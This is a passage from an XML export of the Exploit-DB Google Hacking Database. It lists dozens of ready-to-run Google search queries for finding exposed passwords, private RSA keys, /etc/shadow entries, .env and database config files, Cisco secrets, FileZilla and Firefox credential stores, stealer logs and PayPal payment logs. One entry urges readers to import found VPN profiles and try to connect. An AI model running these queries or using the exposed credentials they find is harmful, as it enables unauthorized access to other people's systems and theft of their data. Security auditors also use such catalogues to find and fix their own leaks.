<textualDescription>Development of UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).This search finds configuration files to Unreal IRCd. An attacker can use these to possibly determine the oper passwd. Be warned that there are samples in the results.</textualDescription>
<query>filetype:conf inurl:unrealircd.conf -cvs -gentoo</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aconf+inurl%3Aunrealircd.conf+-cvs+-gentoo</querystring>
<edb></edb>
<date>2004-07-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>919</id>
<link>https://www.exploit-db.com/ghdb/919</link>
<category>Files Containing Juicy Info</category>
<shortDescription>WebLog Referrers</shortDescription>
<textualDescription>ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs.</textualDescription>
<query>allinurl:&quot;weblog/referrers&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22weblog/referrers%22&amp;sourceid=opera&amp;num=0</querystring>
<edb></edb>
<date>2005-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>305</id>
<link>https://www.exploit-db.com/ghdb/305</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Welcome to ntop!</shortDescription>
<textualDescription>Ntop shows the current network usage. It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host. An attacker may use this to gather information about hosts and services behind the firewall.</textualDescription>
<query>intitle:&quot;Welcome to ntop!&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Welcome+to+ntop%21%22</querystring>
<edb></edb>
<date>2004-07-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>5666</id>
<link>https://www.exploit-db.com/ghdb/5666</link>
<category>Files Containing Juicy Info</category>
<shortDescription>[ipn] ext:log</shortDescription>
<textualDescription># Google Dork : [ipn] ext:log
# Category : Sensitive Online Shopping Info
# Date : 10-12-2019
# Author : Eka Syahwan
This data contains a log of PayPal payments used by many websites.
</textualDescription>
<query>[ipn] ext:log</query>
<querystring>https://www.google.com/search?q=[ipn] ext:log</querystring>
<edb></edb>
<date>2019-12-16</date>
<author>Eka Syahwan</author>
</entry>
<entry>
<id>7696</id>
<link>https://www.exploit-db.com/ghdb/7696</link>
<category>Files Containing Juicy Info</category>
<shortDescription>{intitle: indexof/.git }</shortDescription>
<textualDescription># Google Dork: {intitle: indexof/.git }
# Files Containing Juicy Info
# Date: 9/11/2021
# Exploit Author: Aadesh deep namdev</textualDescription>
<query>{intitle: indexof/.git }</query>
<querystring>https://www.google.com/search?q={intitle: indexof/.git }</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Aadesh deep namdev</author>
</entry>
<entry>
<id>960</id>
<link>https://www.exploit-db.com/ghdb/960</link>
<category>Files Containing Passwords</category>
<shortDescription>!Host=*.* intext:enc_UserPassword=* ext:pcf</shortDescription>
<textualDescription>some people actually keep their VPN profiles on the internet...omg... Simply donwload the pcf file, import it in your Cisco VPN client and try to connect</textualDescription>
<query>!Host=*.* intext:enc_UserPassword=* ext:pcf</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%21Host%3D*.*+intext%3Aenc_UserPassword%3D*++ext%3Apcf</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4488</id>
<link>https://www.exploit-db.com/ghdb/4488</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot; End Stealer &quot; ext:txt</shortDescription>
<textualDescription>Finds logs from &quot;Black Stealer&quot;, an internet password stealer
Dxtroyer</textualDescription>
<query>&quot; End Stealer &quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot; End Stealer &quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4433</id>
<link>https://www.exploit-db.com/ghdb/4433</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;# -FrontPage-&quot; ext:pwd</shortDescription>
<textualDescription>Finds MS Frontpage passwords!
Dxtroyer</textualDescription>
<query>&quot;# -FrontPage-&quot; ext:pwd</query>
<querystring>https://www.google.com/search?q=&quot;# -FrontPage-&quot; ext:pwd</querystring>
<edb></edb>
<date>2017-04-13</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>383</id>
<link>https://www.exploit-db.com/ghdb/383</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;# -FrontPage-&quot; ext:pwd inurl:(service | authors | administrators | users) &quot;# -FrontPage-&quot; inurl:service.pwd</shortDescription>
<textualDescription>Frontpage.. very nice clean search results listing !!No further comments required..changelog:22 jan 2005: improved by vs1400 !</textualDescription>
<query>ext:pwd inurl:(service | authors | administrators | users) &quot;# -FrontPage-&quot;</query>
<querystring>https://www.google.com/search?q=ext%3Apwd+inurl%3A%28service+%7C+authors+%7C+administrators+%7C+users%29+%22%23+-FrontPage-%22</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6871</id>
<link>https://www.exploit-db.com/ghdb/6871</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;# -FrontPage-&quot; ext:pwd inurl:(service | authors | administrators | users) &quot;# -FrontPage-&quot; inurl:service.pwd</shortDescription>
<textualDescription># Dork: &quot;# -FrontPage-&quot; ext:pwd inurl:(service | authors | administrators | users) &quot;# -FrontPage-&quot; inurl:service.pwd
Thankyou,
Parth Patel.</textualDescription>
<query>&quot;# -FrontPage-&quot; ext:pwd inurl:(service | authors | administrators | users) &quot;# -FrontPage-&quot; inurl:service.pwd</query>
<querystring>https://www.google.com/search?q=&quot;# -FrontPage-&quot; ext:pwd inurl:(service | authors | administrators | users) &quot;# -FrontPage-&quot; inurl:service.pwd</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>6565</id>
<link>https://www.exploit-db.com/ghdb/6565</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;'username' =&gt;&quot; + &quot;'password' =&gt;&quot; ext:log</shortDescription>
<textualDescription># Google Dork: &quot;'username' =&gt;&quot; + &quot;'password' =&gt;&quot; ext:log
# Exposed passwords, and much more...
# Date: 22/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;'username' =&gt;&quot; + &quot;'password' =&gt;&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;'username' =&gt;&quot; + &quot;'password' =&gt;&quot; ext:log</querystring>
<edb></edb>
<date>2020-09-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4455</id>
<link>https://www.exploit-db.com/ghdb/4455</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;-----BEGIN RSA PRIVATE KEY-----&quot; ext:key</shortDescription>
<textualDescription>Some hashes (passwords, certs, etc.)
Dxtroyer</textualDescription>
<query>&quot;-----BEGIN RSA PRIVATE KEY-----&quot; ext:key</query>
<querystring>https://www.google.com/search?q=&quot;-----BEGIN RSA PRIVATE KEY-----&quot; ext:key</querystring>
<edb></edb>
<date>2017-05-02</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>6510</id>
<link>https://www.exploit-db.com/ghdb/6510</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;/** MySQL database password */&quot; ext:txt | ext:cfg | ext:env | ext:ini</shortDescription>
<textualDescription># Google Dork: &quot;/** MySQL database password */&quot; ext:txt | ext:cfg | ext:env
| ext:ini
# MySQL database usernames and passwords.
# Date: 1/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;/** MySQL database password */&quot; ext:txt | ext:cfg | ext:env | ext:ini</query>
<querystring>https://www.google.com/search?q=&quot;/** MySQL database password */&quot; ext:txt | ext:cfg | ext:env | ext:ini</querystring>
<edb></edb>
<date>2020-09-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5953</id>
<link>https://www.exploit-db.com/ghdb/5953</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;/etc/shadow root:$&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git</shortDescription>
<textualDescription># Google Dork: &quot;/etc/shadow root:$&quot; ext:cfg OR ext:log OR ext:txt OR
ext:sql -git
# By using this dork some root passwords in /etc/shadow can be found.
# Date: 27/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;/etc/shadow root:$&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git</query>
<querystring>https://www.google.com/search?q=&quot;/etc/shadow root:$&quot; ext:cfg OR ext:log OR ext:txt OR ext:sql -git</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1132</id>
<link>https://www.exploit-db.com/ghdb/1132</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;admin account info&quot; filetype:log</shortDescription>
<textualDescription>searches for logs containing admin server account information such as username and password.</textualDescription>
<query>&quot;admin account info&quot; filetype:log</query>
<querystring>https://www.google.com/search?q=+%22admin+account+info%22+filetype%3Alog</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5935</id>
<link>https://www.exploit-db.com/ghdb/5935</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;admin password irreversible-cipher&quot; ext:txt OR ext:log OR ext:cfg</shortDescription>
<textualDescription># Google Dork: &quot;admin password irreversible-cipher&quot; ext:txt OR ext:log OR
ext:cfg
# Configuration files containing usernames and passwords.
# Date: 22/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;admin password irreversible-cipher&quot; ext:txt OR ext:log OR ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;admin password irreversible-cipher&quot; ext:txt OR ext:log OR ext:cfg</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6582</id>
<link>https://www.exploit-db.com/ghdb/6582</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;admin_password&quot; ext:txt | ext:log | ext:cfg</shortDescription>
<textualDescription># Google Dork: &quot;admin_password&quot; ext:txt | ext:log | ext:cfg
# Admin passwords.
# Date: 29/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;admin_password&quot; ext:txt | ext:log | ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;admin_password&quot; ext:txt | ext:log | ext:cfg</querystring>
<edb></edb>
<date>2020-09-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6596</id>
<link>https://www.exploit-db.com/ghdb/6596</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;anaconda-ks.cfg&quot; | &quot;ks.cfg&quot; ext:cfg -git -gitlab</shortDescription>
<textualDescription># Google Dork: &quot;anaconda-ks.cfg&quot; | &quot;ks.cfg&quot; ext:cfg -git -gitlab
# Sensitive directories containing passwords.
# Date: 6/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;anaconda-ks.cfg&quot; | &quot;ks.cfg&quot; ext:cfg -git -gitlab</query>
<querystring>https://www.google.com/search?q=&quot;anaconda-ks.cfg&quot; | &quot;ks.cfg&quot; ext:cfg -git -gitlab</querystring>
<edb></edb>
<date>2020-10-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>409</id>
<link>https://www.exploit-db.com/ghdb/409</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;AutoCreate=TRUE password=*&quot;</shortDescription>
<textualDescription>This searches the password for &quot;Website Access Analyzer&quot;, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/Note: google to find the results of this software.</textualDescription>
<query>&quot;AutoCreate=TRUE password=*&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;&amp;q=%22AutoCreate%3DTRUE+password%3D*%22</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3960</id>
<link>https://www.exploit-db.com/ghdb/3960</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;automatic teller&quot; &quot;operator manual&quot; &quot;password&quot; filetype:pdf</shortDescription>
<textualDescription>ATM Passwords
&quot;automatic teller&quot; &quot;operator manual&quot; &quot;password&quot; filetype:pdf</textualDescription>
<query>&quot;automatic teller&quot; &quot;operator manual&quot; &quot;password&quot; filetype:pdf</query>
<querystring>https://www.google.com/search?q=&quot;automatic teller&quot; &quot;operator manual&quot; &quot;password&quot; filetype:pdf</querystring>
<edb></edb>
<date>2014-09-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4926</id>
<link>https://www.exploit-db.com/ghdb/4926</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;battlefield&quot; &quot;email&quot; site:pastebin.com</shortDescription>
<textualDescription>Hacked EA/Origin passwords
</textualDescription>
<query>&quot;battlefield&quot; &quot;email&quot; site:pastebin.com</query>
<querystring>https://www.google.com/search?q=&quot;battlefield&quot; &quot;email&quot; site:pastebin.com</querystring>
<edb></edb>
<date>2018-08-20</date>
<author>Chris Rogers</author>
</entry>
<entry>
<id>3888</id>
<link>https://www.exploit-db.com/ghdb/3888</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;BEGIN RSA PRIVATE KEY&quot; filetype:key -github</shortDescription>
<textualDescription>To find private RSA Private SSL Keys</textualDescription>
<query>&quot;BEGIN RSA PRIVATE KEY&quot; filetype:key -github</query>
<querystring>https://www.google.com/search?q=&quot;BEGIN RSA PRIVATE KEY&quot; filetype:key -github</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6193</id>
<link>https://www.exploit-db.com/ghdb/6193</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;config.php.bak&quot; intitle:&quot;index of&quot;</shortDescription>
<textualDescription># Dork: &quot;config.php.bak&quot; intitle:&quot;index of&quot;
# Date: 2020-06-02
# Exploit Author: M.Harsha vardhan
#Description : This dorks leaks the db user_pass from backup files of database/phpmyadmin
</textualDescription>
<query>&quot;config.php.bak&quot; intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;config.php.bak&quot; intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>M.Harsha vardhan</author>
</entry>
<entry>
<id>5822</id>
<link>https://www.exploit-db.com/ghdb/5822</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;configure account user encrypted&quot; ext:cfg</shortDescription>
<textualDescription># Google Dork: &quot;configure account user encrypted&quot; ext:cfg
intext:&quot;configure account user encrypted&quot;
intext:&quot;configure account admin encrypted&quot;
&quot;configure account admin encrypted&quot; ext:cfg
# By using this dork, user passwords in configuration files can be found.
# Date: 21/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;configure account user encrypted&quot; ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;configure account user encrypted&quot; ext:cfg</querystring>
<edb></edb>
<date>2020-03-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5534</id>
<link>https://www.exploit-db.com/ghdb/5534</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;contrasena&quot; filetype:sql -github.com</shortDescription>
<textualDescription>Google Dork: &quot;contrasena&quot; filetype:sql -github.com
Date: 09/14/2019
Exploit Author: th3d3xt3r
Category: Files containing passwords
</textualDescription>
<query>&quot;contrasena&quot; filetype:sql -github.com</query>
<querystring>https://www.google.com/search?q=&quot;contrasena&quot; filetype:sql -github.com</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>The Dexter</author>
</entry>
<entry>
<id>6769</id>
<link>https://www.exploit-db.com/ghdb/6769</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;cpanel username&quot; &quot;cpanel password&quot; ext:txt</shortDescription>
<textualDescription>Dork: &quot;cpanel username&quot; &quot;cpanel password&quot; ext:txt
Author: </textualDescription>
<query>&quot;cpanel username&quot; &quot;cpanel password&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;cpanel username&quot; &quot;cpanel password&quot; ext:txt</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5821</id>
<link>https://www.exploit-db.com/ghdb/5821</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;create account&quot; admin ext:cfg</shortDescription>
<textualDescription># Google Dork: &quot;create account&quot; admin ext:cfg
# By using this dork, admin passwords in configuration files can be found.
# Date: 21/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;create account&quot; admin ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;create account&quot; admin ext:cfg</querystring>
<edb></edb>
<date>2020-03-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5826</id>
<link>https://www.exploit-db.com/ghdb/5826</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;d-i passwd/root-password-crypted password&quot; ext:cfg</shortDescription>
<textualDescription># Google Dork:
&quot;d-i passwd/root-password-crypted password&quot; ext:cfg
&quot;d-i passwd/user-password-crypted&quot; ext:cfg
intext:&quot;d-i network-console/password&quot;
# By using this dork, usernames and passwords in configuration files can be
found.
# Date: 23/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;d-i passwd/root-password-crypted password&quot; ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;d-i passwd/root-password-crypted password&quot; ext:cfg</querystring>
<edb></edb>
<date>2020-03-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4691</id>
<link>https://www.exploit-db.com/ghdb/4691</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;database_password&quot; filetype:yml &quot;config/parameters.yml</shortDescription>
<textualDescription>Database credentials for mostly CakePHP apps
database_password&quot; filetype:yml &quot;config/parameters.yml&quot;
Thanks
Arya Usha
</textualDescription>
<query>&quot;database_password&quot; filetype:yml &quot;config/parameters.yml</query>
<querystring>https://www.google.com/search?q=&quot;database_password&quot; filetype:yml &quot;config/parameters.yml</querystring>
<edb></edb>
<date>2018-03-07</date>
<author>Arya Usha</author>
</entry>
<entry>
<id>4686</id>
<link>https://www.exploit-db.com/ghdb/4686</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;database_password&quot; filetype:yml &quot;config/parameters.yml&quot;</shortDescription>
<textualDescription>*Google dork description: *database credentials for mostly symfony apps
*Google Search:* &quot;database_password&quot; filetype:yml &quot;config/parameters.yml&quot;
*Submitted by:* Alfie
*Website: (*https://the-infosec.com*)*</textualDescription>
<query>&quot;database_password&quot; filetype:yml &quot;config/parameters.yml&quot;</query>
<querystring>https://www.google.com/search?q=&quot;database_password&quot; filetype:yml &quot;config/parameters.yml&quot;</querystring>
<edb></edb>
<date>2018-03-02</date>
<author>Alfie</author>
</entry>
<entry>
<id>6608</id>
<link>https://www.exploit-db.com/ghdb/6608</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;db.username&quot; + &quot;db.password&quot; ext:properties</shortDescription>
<textualDescription># Google Dork: &quot;db.username&quot; + &quot;db.password&quot; ext:properties
# Files containing usernames and passwords.
# Date: 13/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;db.username&quot; + &quot;db.password&quot; ext:properties</query>
<querystring>https://www.google.com/search?q=&quot;db.username&quot; + &quot;db.password&quot; ext:properties</querystring>
<edb></edb>
<date>2020-10-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6689</id>
<link>https://www.exploit-db.com/ghdb/6689</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;define('DB_USER',&quot; + &quot;define('DB_PASSWORD',&quot; ext:txt</shortDescription>
<textualDescription># Google Dork: &quot;define('DB_USER',&quot; + &quot;define('DB_PASSWORD',&quot; ext:txt
# Sensitive directories containing Database usernames and passwords.
# Date: 18/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;define('DB_USER',&quot; + &quot;define('DB_PASSWORD',&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;define('DB_USER',&quot; + &quot;define('DB_PASSWORD',&quot; ext:txt</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6704</id>
<link>https://www.exploit-db.com/ghdb/6704</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;define('SECURE_AUTH_KEY'&quot; + &quot;define('LOGGED_IN_KEY'&quot; + &quot;define('NONCE_KEY'&quot; ext:txt | ext:cfg | ext:env | ext:ini</shortDescription>
<textualDescription># Google Dork: &quot;define('SECURE_AUTH_KEY'&quot; + &quot;define('LOGGED_IN_KEY'&quot; + &quot;define('NONCE_KEY'&quot; ext:txt | ext:cfg | ext:env | ext:ini
# Files containing passwords, keys, and more...
# Date: 25/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;define('SECURE_AUTH_KEY'&quot; + &quot;define('LOGGED_IN_KEY'&quot; + &quot;define('NONCE_KEY'&quot; ext:txt | ext:cfg | ext:env | ext:ini</query>
<querystring>https://www.google.com/search?q=&quot;define('SECURE_AUTH_KEY'&quot; + &quot;define('LOGGED_IN_KEY'&quot; + &quot;define('NONCE_KEY'&quot; ext:txt | ext:cfg | ext:env | ext:ini</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6481</id>
<link>https://www.exploit-db.com/ghdb/6481</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;EMAIL_HOST_PASSWORD&quot; ext:yml | ext:env | ext:txt | ext:log</shortDescription>
<textualDescription># Google Dork: &quot;EMAIL_HOST_PASSWORD&quot; ext:yml | ext:env | ext:txt | ext:log
# Exposed passwords.
# Date: 14/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;EMAIL_HOST_PASSWORD&quot; ext:yml | ext:env | ext:txt | ext:log</query>
<querystring>https://www.google.com/search?q=&quot;EMAIL_HOST_PASSWORD&quot; ext:yml | ext:env | ext:txt | ext:log</querystring>
<edb></edb>
<date>2020-08-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5813</id>
<link>https://www.exploit-db.com/ghdb/5813</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;enable password&quot; ext:cfg -git -cisco.com</shortDescription>
<textualDescription># Google Dork:
&quot;enable password&quot; ext:cfg -git -cisco.com
password aux-password ext:cfg -git -cisco.com
password vty-password ext:cfg -git -cisco.com
service password-encryption ext:cfg -git -cisco.com
intext:&quot;set enablepass password&quot;
&quot;set enablepass password&quot; ext:txt
intext:&quot;password encrypted&quot; filetype:txt
&quot;password encrypted&quot; ext:cfg
# By using this dork, passwords in Cisco configuration files can be found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;enable password&quot; ext:cfg -git -cisco.com</query>
<querystring>https://www.google.com/search?q=&quot;enable password&quot; ext:cfg -git -cisco.com</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7248</id>
<link>https://www.exploit-db.com/ghdb/7248</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;enable secret 5&quot; ext:txt | ext:cfg</shortDescription>
<textualDescription># Google Dork: &quot;enable secret 5&quot; ext:txt | ext:cfg
# Files Containing Passwords.
# Date: 8/08/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;enable secret 5&quot; ext:txt | ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;enable secret 5&quot; ext:txt | ext:cfg</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4637</id>
<link>https://www.exploit-db.com/ghdb/4637</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;enable secret&quot; ext:cfg -git -cisco.com</shortDescription>
<textualDescription>Finds files containing Cisco NAC hostnames and passwords in plaintext
Dxtroyer
P.S. Some honeypots too, sorry :P
</textualDescription>
<query>&quot;enable secret&quot; ext:cfg -git -cisco.com</query>
<querystring>https://www.google.com/search?q=&quot;enable secret&quot; ext:cfg -git -cisco.com</querystring>
<edb></edb>
<date>2017-12-11</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4428</id>
<link>https://www.exploit-db.com/ghdb/4428</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;END_FILE&quot; inurl:&quot;/password.log&quot;</shortDescription>
<textualDescription>Finds user-specific login info.
Dxtroyer</textualDescription>
<query>&quot;END_FILE&quot; inurl:&quot;/password.log&quot;</query>
<querystring>https://www.google.com/search?q=&quot;END_FILE&quot; inurl:&quot;/password.log&quot;</querystring>
<edb></edb>
<date>2017-04-12</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4483</id>
<link>https://www.exploit-db.com/ghdb/4483</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;FileZilla&quot; inurl:&quot;recentservers.xml&quot; -git</shortDescription>
<textualDescription>Finds FileZilla recent server files with plain text usernames/passwords
Dxtroyer</textualDescription>
<query>&quot;FileZilla&quot; inurl:&quot;recentservers.xml&quot; -git</query>
<querystring>https://www.google.com/search?q=&quot;FileZilla&quot; inurl:&quot;recentservers.xml&quot; -git</querystring>
<edb></edb>
<date>2017-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>432</id>
<link>https://www.exploit-db.com/ghdb/432</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;http://*:*@www&quot; domainname</shortDescription>
<textualDescription>This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net&quot;http://*:*@www&quot; bangbus or &quot;http://*:*@www&quot;bangbusAnother way is by just typing&quot;http://bob:bob@www&quot;</textualDescription>
<query>&quot;http://*:*@www&quot; bob:bob</query>
<querystring>https://www.google.com/search?safe=off&amp;q=%22http%3A%2F%2F*%3A*%40www%22+bob%3Abob&amp;num=100</querystring>
<edb></edb>
<date>2004-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>7328</id>
<link>https://www.exploit-db.com/ghdb/7328</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;index of /&quot; +passwd</shortDescription>
<textualDescription># Google Dork: &quot;index of /&quot; +passwd
# Files Containing Passwords
# Date:24/09/2021
# Exploit Author: Sugavanam D</textualDescription>
<query>&quot;index of /&quot; +passwd</query>
<querystring>https://www.google.com/search?q=&quot;index of /&quot; +passwd</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Sugavanam D</author>
</entry>
<entry>
<id>6207</id>
<link>https://www.exploit-db.com/ghdb/6207</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;index of&quot; &quot;.env&quot;</shortDescription>
<textualDescription># Title: Sensitive file disclosure containing passwords.
# Google Dork: &quot;index of&quot; &quot;.env&quot;
# Date: 04/06/2020
# Author: Ritik Sahni
</textualDescription>
<query>&quot;index of&quot; &quot;.env&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;.env&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Ritik Sahni</author>
</entry>
<entry>
<id>6360</id>
<link>https://www.exploit-db.com/ghdb/6360</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Index of&quot; &quot;/yahoo_site_admin/credentials&quot;</shortDescription>
<textualDescription>Google Dork: &quot;Index of&quot; &quot;/yahoo_site_admin/credentials&quot;
Title: File containing passwords
Date: 01/07/2020
Author : Mohit Khemchandani</textualDescription>
<query>&quot;Index of&quot; &quot;/yahoo_site_admin/credentials&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;/yahoo_site_admin/credentials&quot;</querystring>
<edb></edb>
<date>2020-07-01</date>
<author>Mohit khemchandani</author>
</entry>
<entry>
<id>4418</id>
<link>https://www.exploit-db.com/ghdb/4418</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Index of&quot; &quot;logins.json&quot; &quot;key3.db&quot;</shortDescription>
<textualDescription>Finds directories containing saved Firefox passwords, browsing history, and
more.
Dxtroyer</textualDescription>
<query>&quot;Index of&quot; &quot;logins.json&quot; &quot;key3.db&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Index of&quot; &quot;logins.json&quot; &quot;key3.db&quot;</querystring>
<edb></edb>
<date>2017-04-10</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>6571</id>
<link>https://www.exploit-db.com/ghdb/6571</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;index of&quot; &quot;password.ini&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;password.ini&quot;
# Description :- Dork shows configuration files for password.
# Date: 23/09/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
Thanks,
Sahil Saxena
</textualDescription>
<query>&quot;index of&quot; &quot;password.ini&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;password.ini&quot;</querystring>
<edb></edb>
<date>2020-09-24</date>
<author>Sahil Saxena</author>
</entry>
<entry>
<id>498</id>
<link>https://www.exploit-db.com/ghdb/498</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;index of/&quot; &quot;ws_ftp.ini&quot; &quot;parent directory&quot;</shortDescription>
<textualDescription>This search is a cleanup of a previous entry by J0hnny. It uses &quot;parent directory&quot; to avoid results other than directory listings.WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords. There is another way to find this file, that was added by Xewan:filetype:ini ws_ftp pwdIn our experience it's good to try both methods, as the results will differ quite a bit.</textualDescription>
<query>&quot;index of/&quot; &quot;ws_ftp.ini&quot; &quot;parent directory&quot;</query>
